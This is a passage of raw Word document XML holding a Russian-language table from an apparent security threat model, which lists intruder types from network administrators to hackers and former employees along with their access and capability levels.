            <w:tcW w:w="2102" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04FDBED3"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Уровни возможностей нарушителей</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="0047171E" w14:paraId="7E0A5F48" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="1177"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F64EC59"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Внутренний</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DCBBFE4"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Сетевой администратор</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C8D5216"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Полный доступ к сетевым устройствам, конфигурациям, логам</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5493020A"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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2102" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26C210C7"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В4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="0047171E" w14:paraId="73603D81" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="1124"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EF647D0"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="792DDDBC"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Системный администратор</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FA07A24"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Расширенный доступ к серверам и части сетевого оборудования</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A7AB93A"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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2102" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5120D38A"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В3–В4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="0047171E" w14:paraId="2F788C87" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="774"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E247F0A"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="692A822A"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Офисный сотрудник</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ED075CD"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 xml:space="preserve">Доступ к рабочему месту, корпоративной сети, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0047171E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Wi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0047171E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-Fi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E440C92"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Средняя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2102" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53A3015F"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В2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="0047171E" w14:paraId="5D507FCD" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="630"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EB3E9EA"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17218BCE"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Руководство</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CFD107C"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Ограниченный доступ к корпоративной сети</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="136E5D29"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Низкая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2102" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BF8A7F8"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В1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="0047171E" w14:paraId="430AEC2C" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="945"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7443C9D7"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67A32C4C"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Охранник / физическая охрана</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79E74EBA"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Доступ к помещениям, где расположено оборудование</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39C41DB9"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Низкая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2102" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33B50844"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В1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="0047171E" w14:paraId="0548DAB2" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="894"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15133B2A"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD1724E"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 xml:space="preserve">Обслуживающий персонал </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="071AEF15"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Ограниченный физический доступ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F52BCD1"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Низкая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2102" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14225CA5"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В1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="0047171E" w14:paraId="458EF652" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="1046"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56FA8D58"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Внешний</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="650D4906"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Клиент / посетитель</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49B76623"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 xml:space="preserve">Попытки несанкционированного доступа к гостевой </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0047171E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Wi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0047171E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-Fi, портам сети</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BD62954"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Низкая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2102" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01FC427A"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В1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="0047171E" w14:paraId="31EE5088" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="945"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="188C83E2"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61AC2248"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Конкурент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23AC124E"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Попытки разведки сети, MITM, анализа каналов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B46EE44"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Средняя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2102" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B2F5576"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В3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="0047171E" w14:paraId="5DCB3706" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="945"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E9441E2"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38B031BA"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Хакер / внешняя группа</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A707001"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 xml:space="preserve">Использование уязвимостей, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0047171E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DDoS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0047171E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>, проникновение в сеть</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2685C27D"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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2102" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7482ED01"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В4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="0047171E" w14:paraId="03CFBEB5" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="1260"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="580ABE2A"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1993" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F2E3B0F"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Бывший сотрудник</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
